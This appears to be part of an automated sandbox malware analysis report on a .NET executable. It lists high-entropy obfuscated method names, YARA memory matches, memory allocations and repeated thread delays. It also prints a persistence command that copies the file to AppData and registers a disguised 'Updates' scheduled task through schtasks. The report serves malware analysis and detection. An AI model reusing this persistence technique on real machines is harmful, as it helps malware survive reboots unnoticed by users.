              Source: 0.2.file.exe.a400000.6.raw.unpack, hCi7ubO39LUTUumiC2.cs | High entropy of concatenated method names: 'aGsoqQeYti', 'D40o3AYSLc', 'XTSoYVssZ7', 'vdQo6vjlZW', 'P2XowNbF2m', 'hw1Y0jNAsg', 'uTqYuw95hS', 'iOaYbUCd5T', 'FD0Y8GZyfc', 'z3kYeriexH'
              Source: 0.2.file.exe.a400000.6.raw.unpack, F7WtHKJtQWTcou7oqS.cs | High entropy of concatenated method names: 'zlkYKRGMFW', 'vCTYxclDRU', 'zliFGYb0Ca', 'EX5FfKKxBf', 'WYgFBeJGRk', 'i8hFmCRSMA', 'Is7FQ5SmEp', 'GOtFMtvfcM', 'aMBF5ffXFu', 'fEEFTkV3I1'
              Source: 0.2.file.exe.a400000.6.raw.unpack, K8KxjfXRQcRipaOAt1H.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IbU2h4AAj8', 'JUG2S4pEEl', 'Ssj2tN2LPF', 'jHR22dWReo', 'kdT2yecrfG', 'NBt21hRB90', 'nv32pZ8UyK'
              Source: 0.2.file.exe.a400000.6.raw.unpack, lMtam3cA0yx1dQi5MF.cs | High entropy of concatenated method names: 'eSQN9VWtZ9', 'Wt8Nvo3riO', 'QyeNORQHUT', 'XyyNAx5Z0r', 'cswNfet3MF', 'Eg4NBQZYbV', 'pQ2NQdHKvm', 'rQGNMmUAgA', 'PaCNT67THm', 'buwNseurBL'
              Source: 0.2.file.exe.a400000.6.raw.unpack, Cp8HAELrj1ru5cEc6O.cs | High entropy of concatenated method names: 'qSCERfokx', 'M9pI8ug8n', 'a7tHe7eB5', 'HmuxiCk35', 'h2WvlFy3i', 't7cJ0KD2U', 'ykvAxEfyIhf6nM1lO3', 'JumTCBQANw3kyKk8eZ', 'h9ldwIquQ', 'cEbSR3oAa'
              Source: 0.2.file.exe.a400000.6.raw.unpack, JQTcVuRCfs6Kyxwn2i.cs | High entropy of concatenated method names: 'BXxX6346ht', 'i1xXwxbI8G', 'wvEXnKblSv', 'sGBXaeO7Wt', 'V7oXCqSFCi', 'YubXZ39LUT', 'hjoPJNUI8LgHRUX1Sf', 'PKHpVwl7nZslLrZk2Z', 'BxcXXNK2B6', 'eSkXja6w70'
              Source: 0.2.file.exe.a400000.6.raw.unpack, QMCIaMbg5s4A5F1Ftw.cs | High entropy of concatenated method names: 'JsMhCZ3ASZ', 'nY3hg7ifVC', 'AJNhhNpMgh', 'espht4jQVf', 'XUJhyLwe6O', 'i3LhpeS0DN', 'Dispose', 'tODdlodraT', 'yZ9d35MWln', 'CHZdFAZsN7'
              Source: 0.2.file.exe.a400000.6.raw.unpack, unhoQLuGpTXrEEiGIk.cs | High entropy of concatenated method names: 'cXCg8msucl', 'fTHg76MESs', 'OTod4giy9o', 'RYidX639aa', 'yBbgs2WkNi', 'd7WgDMDSgp', 'TGQgc9XmKF', 'zLegPjiUoH', 'ikRgiT9ftb', 'n8egWnj65t'
              Source: 0.2.file.exe.a400000.6.raw.unpack, HNmOmBX4eBFQGadRm6t.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'roZSsLWKKp', 'gCkSDUi03v', 'uD5ScHsJeH', 'mSiSPpP7iB', 'XnLSi2TXUF', 'XFaSWAplPv', 'MUQSkQAXoI'
              Source: 0.2.file.exe.a400000.6.raw.unpack, C346ht9Y1xxbI8GhL8.cs | High entropy of concatenated method names: 'bCK3Pbjhoe', 'rZr3iBwu8M', 'aXC3WcHmrl', 'l1v3k8MBo3', 'QiP30FCTAA', 'DAM3uNi0Am', 'wiJ3bm2jeq', 'dol38ifPOB', 'xPn3eyDSjm', 'DpE374u0ca'
              Source: 0.2.file.exe.a400000.6.raw.unpack, Kp03lmQWNmpMfpEna0.cs | High entropy of concatenated method names: 'WFA6lo3bkq', 'JvO6FELjmU', 'vja6oEt7qD', 'hlZo7EGTdD', 'ViXozDDEtf', 'XlU64mlVl9', 'klW6XQemcW', 'NWt6LApok1', 'lNm6j5YOxs', 'Vcn6RQgJKb'
              Source: 0.2.file.exe.a400000.6.raw.unpack, HuOdfZXXU5PqKvLGHXp.cs | High entropy of concatenated method names: 'bVHS7sh7Lv', 'GD6SzMu4U3', 'hivt409Ux1', 'or9tXhLiY7', 'N5ftL3gCbL', 'wnftjRqJDM', 'sFgtRxN5Wa', 'BWLtqKpAFE', 'TkEtleIFfp', 'wHjt3xoSWt'
              Source: 0.2.file.exe.a400000.6.raw.unpack, L8KxqU5Z5chxFVN1Ct.cs | High entropy of concatenated method names: 'nm06VZFlIh', 'aiJ6UIZRED', 'YyS6EdPQoe', 'eks6ITBoJV', 'Tk66KyWuu5', 'Vcc6HqYGk8', 'jSC6xGREjL', 'pRJ69rymKM', 'Pt06v2IuXL', 'iwX6Jts740'
              Source: 0.2.file.exe.a400000.6.raw.unpack, Urbt7oFB2bKwG3VRLj.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wstLe855n3', 'BZKL7vbiSQ', 'Xw5LzqdBtP', 'zGoj4lvhHZ', 'h5djXXkGqS', 'KKxjLg8HsZ', 'uAIjjOUdWR', 'CPZYrmCimk66nMov6IB'
              Source: 0.2.file.exe.a400000.6.raw.unpack, QZVcKReRAumOGuY0EA.cs | High entropy of concatenated method names: 'EOchOjH0KR', 'wqHhAbCDgl', 'jYEhGO8eyA', 'Hdqhfn7ckw', 'P4dhBqtvrk', 'QethmQ9lbW', 'mCAhQoTlN6', 'dYNhMmV4Cl', 'CcJh5Y6xaC', 'IIThTUJecZ'
              Source: 0.2.file.exe.a400000.6.raw.unpack, x7bpfQ7AV1lU9lutB4.cs | High entropy of concatenated method names: 'DOcSFQPQ8u', 'X43SYq0OJj', 'ihrSoj8id0', 'fq8S681Psy', 'MvdShNFQ2i', 'xfWSweC6Py', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.file.exe.a400000.6.raw.unpack, UWDZo0zBYX4HeHS04i.cs | High entropy of concatenated method names: 'YCOSHOAOOh', 'jFAS96f3Tm', 'iBLSvX2CRq', 'pY7SOxsnYk', 'KdhSAfPAXO', 'eOWSfMEXid', 'f7NSBAwYKY', 'qtfSp6WGND', 'FlRSVI9HBl', 'JrGSUwSwVg'
              Source: 0.2.file.exe.a400000.6.raw.unpack, NQDUis3aDFjfNFfLCL.cs | High entropy of concatenated method names: 'Dispose', 'O4AXe5F1Ft', 'TtQLAWx8Cw', 'gGHrJHMGoe', 'kVyX7L0Kql', 'sF6XzhS3Au', 'ProcessDialogKey', 'g7PL4ZVcKR', 'dAuLXmOGuY', 'UEALLp7bpf'
              Source: 0.2.file.exe.a400000.6.raw.unpack, grbhcskJK8fq6kUfDJ.cs | High entropy of concatenated method names: 'fPxgnJS4hu', 'UHagasiPUR', 'ToString', 'lPeglU7aff', 'poFg3e5Vd5', 'OdIgFjUxJ9', 'T2DgYewGuF', 'yphgoFgUS2', 'keUg6L52C4', 'bNJgwELrlP'
              Source: 0.2.file.exe.a400000.6.raw.unpack, LL0pDnWLwxJhYsmNZi.cs | High entropy of concatenated method names: 'ToString', 'EFxZsprHOs', 'WldZAKTEVo', 'qDiZGtoumO', 'XY4ZfO1Rc3', 'JCJZBTFEWq', 'pVFZmjyVxs', 'I82ZQvLIfk', 'qciZMcdbUE', 'fKPZ5TOetE'
              Source: 0.2.file.exe.a400000.6.raw.unpack, PdOKg2Pfglta4gw7b6.cs | High entropy of concatenated method names: 'vJpCT8iCCu', 'k18CDOa7tb', 'qB1CPTPiOL', 'T9LCiAPxfo', 'rXaCA7nDSp', 'zkqCGMvyJT', 'AYiCfHWQC9', 'y5YCBi2TmD', 'PugCm7BARt', 'jyrCQbxmno'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, QIPlbgwOxDNvtcBdQw.cs | High entropy of concatenated method names: 'FgHjqIT7DP', 'NAdjlbThCd', 'poij3weWBT', 'CA7jFlJe61', 'KbljYSJjil', 'FGGjoiZAYl', 'C2dj6wASdi', 'GvPjwY8xej', 'SQ2jrjWJFI', 'hASjnGUOq7'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, m2S1o1vvEKblSvSGBe.cs | High entropy of concatenated method names: 'UFoFIIEfPx', 'sGtFHaaRSV', 'Kf7F9IHW1C', 'f4HFvvIPFL', 'JSFFC1S71s', 'B8kFZaMGDh', 'beSFgAj268', 'dZvFdY0br2', 't6AFhHgfwu', 'kFyFSZeFJr'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, hCi7ubO39LUTUumiC2.cs | High entropy of concatenated method names: 'aGsoqQeYti', 'D40o3AYSLc', 'XTSoYVssZ7', 'vdQo6vjlZW', 'P2XowNbF2m', 'hw1Y0jNAsg', 'uTqYuw95hS', 'iOaYbUCd5T', 'FD0Y8GZyfc', 'z3kYeriexH'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, F7WtHKJtQWTcou7oqS.cs | High entropy of concatenated method names: 'zlkYKRGMFW', 'vCTYxclDRU', 'zliFGYb0Ca', 'EX5FfKKxBf', 'WYgFBeJGRk', 'i8hFmCRSMA', 'Is7FQ5SmEp', 'GOtFMtvfcM', 'aMBF5ffXFu', 'fEEFTkV3I1'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, K8KxjfXRQcRipaOAt1H.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IbU2h4AAj8', 'JUG2S4pEEl', 'Ssj2tN2LPF', 'jHR22dWReo', 'kdT2yecrfG', 'NBt21hRB90', 'nv32pZ8UyK'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, lMtam3cA0yx1dQi5MF.cs | High entropy of concatenated method names: 'eSQN9VWtZ9', 'Wt8Nvo3riO', 'QyeNORQHUT', 'XyyNAx5Z0r', 'cswNfet3MF', 'Eg4NBQZYbV', 'pQ2NQdHKvm', 'rQGNMmUAgA', 'PaCNT67THm', 'buwNseurBL'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, Cp8HAELrj1ru5cEc6O.cs | High entropy of concatenated method names: 'qSCERfokx', 'M9pI8ug8n', 'a7tHe7eB5', 'HmuxiCk35', 'h2WvlFy3i', 't7cJ0KD2U', 'ykvAxEfyIhf6nM1lO3', 'JumTCBQANw3kyKk8eZ', 'h9ldwIquQ', 'cEbSR3oAa'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, JQTcVuRCfs6Kyxwn2i.cs | High entropy of concatenated method names: 'BXxX6346ht', 'i1xXwxbI8G', 'wvEXnKblSv', 'sGBXaeO7Wt', 'V7oXCqSFCi', 'YubXZ39LUT', 'hjoPJNUI8LgHRUX1Sf', 'PKHpVwl7nZslLrZk2Z', 'BxcXXNK2B6', 'eSkXja6w70'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, QMCIaMbg5s4A5F1Ftw.cs | High entropy of concatenated method names: 'JsMhCZ3ASZ', 'nY3hg7ifVC', 'AJNhhNpMgh', 'espht4jQVf', 'XUJhyLwe6O', 'i3LhpeS0DN', 'Dispose', 'tODdlodraT', 'yZ9d35MWln', 'CHZdFAZsN7'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, unhoQLuGpTXrEEiGIk.cs | High entropy of concatenated method names: 'cXCg8msucl', 'fTHg76MESs', 'OTod4giy9o', 'RYidX639aa', 'yBbgs2WkNi', 'd7WgDMDSgp', 'TGQgc9XmKF', 'zLegPjiUoH', 'ikRgiT9ftb', 'n8egWnj65t'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, HNmOmBX4eBFQGadRm6t.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'roZSsLWKKp', 'gCkSDUi03v', 'uD5ScHsJeH', 'mSiSPpP7iB', 'XnLSi2TXUF', 'XFaSWAplPv', 'MUQSkQAXoI'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, C346ht9Y1xxbI8GhL8.cs | High entropy of concatenated method names: 'bCK3Pbjhoe', 'rZr3iBwu8M', 'aXC3WcHmrl', 'l1v3k8MBo3', 'QiP30FCTAA', 'DAM3uNi0Am', 'wiJ3bm2jeq', 'dol38ifPOB', 'xPn3eyDSjm', 'DpE374u0ca'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, Kp03lmQWNmpMfpEna0.cs | High entropy of concatenated method names: 'WFA6lo3bkq', 'JvO6FELjmU', 'vja6oEt7qD', 'hlZo7EGTdD', 'ViXozDDEtf', 'XlU64mlVl9', 'klW6XQemcW', 'NWt6LApok1', 'lNm6j5YOxs', 'Vcn6RQgJKb'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, HuOdfZXXU5PqKvLGHXp.cs | High entropy of concatenated method names: 'bVHS7sh7Lv', 'GD6SzMu4U3', 'hivt409Ux1', 'or9tXhLiY7', 'N5ftL3gCbL', 'wnftjRqJDM', 'sFgtRxN5Wa', 'BWLtqKpAFE', 'TkEtleIFfp', 'wHjt3xoSWt'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, L8KxqU5Z5chxFVN1Ct.cs | High entropy of concatenated method names: 'nm06VZFlIh', 'aiJ6UIZRED', 'YyS6EdPQoe', 'eks6ITBoJV', 'Tk66KyWuu5', 'Vcc6HqYGk8', 'jSC6xGREjL', 'pRJ69rymKM', 'Pt06v2IuXL', 'iwX6Jts740'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, Urbt7oFB2bKwG3VRLj.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wstLe855n3', 'BZKL7vbiSQ', 'Xw5LzqdBtP', 'zGoj4lvhHZ', 'h5djXXkGqS', 'KKxjLg8HsZ', 'uAIjjOUdWR', 'CPZYrmCimk66nMov6IB'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, QZVcKReRAumOGuY0EA.cs | High entropy of concatenated method names: 'EOchOjH0KR', 'wqHhAbCDgl', 'jYEhGO8eyA', 'Hdqhfn7ckw', 'P4dhBqtvrk', 'QethmQ9lbW', 'mCAhQoTlN6', 'dYNhMmV4Cl', 'CcJh5Y6xaC', 'IIThTUJecZ'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, x7bpfQ7AV1lU9lutB4.cs | High entropy of concatenated method names: 'DOcSFQPQ8u', 'X43SYq0OJj', 'ihrSoj8id0', 'fq8S681Psy', 'MvdShNFQ2i', 'xfWSweC6Py', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, UWDZo0zBYX4HeHS04i.cs | High entropy of concatenated method names: 'YCOSHOAOOh', 'jFAS96f3Tm', 'iBLSvX2CRq', 'pY7SOxsnYk', 'KdhSAfPAXO', 'eOWSfMEXid', 'f7NSBAwYKY', 'qtfSp6WGND', 'FlRSVI9HBl', 'JrGSUwSwVg'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, NQDUis3aDFjfNFfLCL.cs | High entropy of concatenated method names: 'Dispose', 'O4AXe5F1Ft', 'TtQLAWx8Cw', 'gGHrJHMGoe', 'kVyX7L0Kql', 'sF6XzhS3Au', 'ProcessDialogKey', 'g7PL4ZVcKR', 'dAuLXmOGuY', 'UEALLp7bpf'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, grbhcskJK8fq6kUfDJ.cs | High entropy of concatenated method names: 'fPxgnJS4hu', 'UHagasiPUR', 'ToString', 'lPeglU7aff', 'poFg3e5Vd5', 'OdIgFjUxJ9', 'T2DgYewGuF', 'yphgoFgUS2', 'keUg6L52C4', 'bNJgwELrlP'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, LL0pDnWLwxJhYsmNZi.cs | High entropy of concatenated method names: 'ToString', 'EFxZsprHOs', 'WldZAKTEVo', 'qDiZGtoumO', 'XY4ZfO1Rc3', 'JCJZBTFEWq', 'pVFZmjyVxs', 'I82ZQvLIfk', 'qciZMcdbUE', 'fKPZ5TOetE'
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, PdOKg2Pfglta4gw7b6.cs | High entropy of concatenated method names: 'vJpCT8iCCu', 'k18CDOa7tb', 'qB1CPTPiOL', 'T9LCiAPxfo', 'rXaCA7nDSp', 'zkqCGMvyJT', 'AYiCfHWQC9', 'y5YCBi2TmD', 'PugCm7BARt', 'jyrCQbxmno'
              Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\aVmZDnwW.exe

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aVmZDnwW" /XML "C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp"

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\file.exe - Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe - Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX (50 occurrences)

              Malware Analysis System Evasion

              Source: Yara match | File source: Process Memory Space: file.exe PID: 3752, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: aVmZDnwW.exe PID: 7328, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exe | Memory allocated: 27C0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe | Memory allocated: 29C0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe | Memory allocated: 27E0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe | Memory allocated: 5000000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe | Memory allocated: 6000000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe | Memory allocated: 6130000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe | Memory allocated: 7130000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe | Memory allocated: A470000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe | Memory allocated: B470000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe | Memory allocated: B900000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe | Memory allocated: C900000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Memory allocated: DE0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Memory allocated: 28B0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Memory allocated: 48B0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Memory allocated: 4EE0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Memory allocated: 5EE0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Memory allocated: 6010000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Memory allocated: 7010000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Memory allocated: 9DC0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Memory allocated: ADC0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Memory allocated: B250000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599875
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599757
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599656
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599546
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599437
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599328
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599218
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599109
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598781
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598671
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598562
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598453
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598343
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598234
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598124
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598015
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597906
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597796
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597672
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597562
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597453
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597337
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597196
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597093
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596984
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596874
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596765
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596656
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596546
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596437
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596328
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596218
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596109
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595998
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595781
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595671
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595531
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595421
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595298
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595172
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595062
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594952
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594843
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594734
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594624
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594515
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599748
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599638
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599520
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599399
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599280
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599169
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599050
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598922
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598812
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598703
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598594
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598469
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598359
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598250
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598140
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598031
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597922
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597812
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597703
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597594
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597484
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597375
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597265
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597156
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597046
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596937
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596828
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596719
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596609
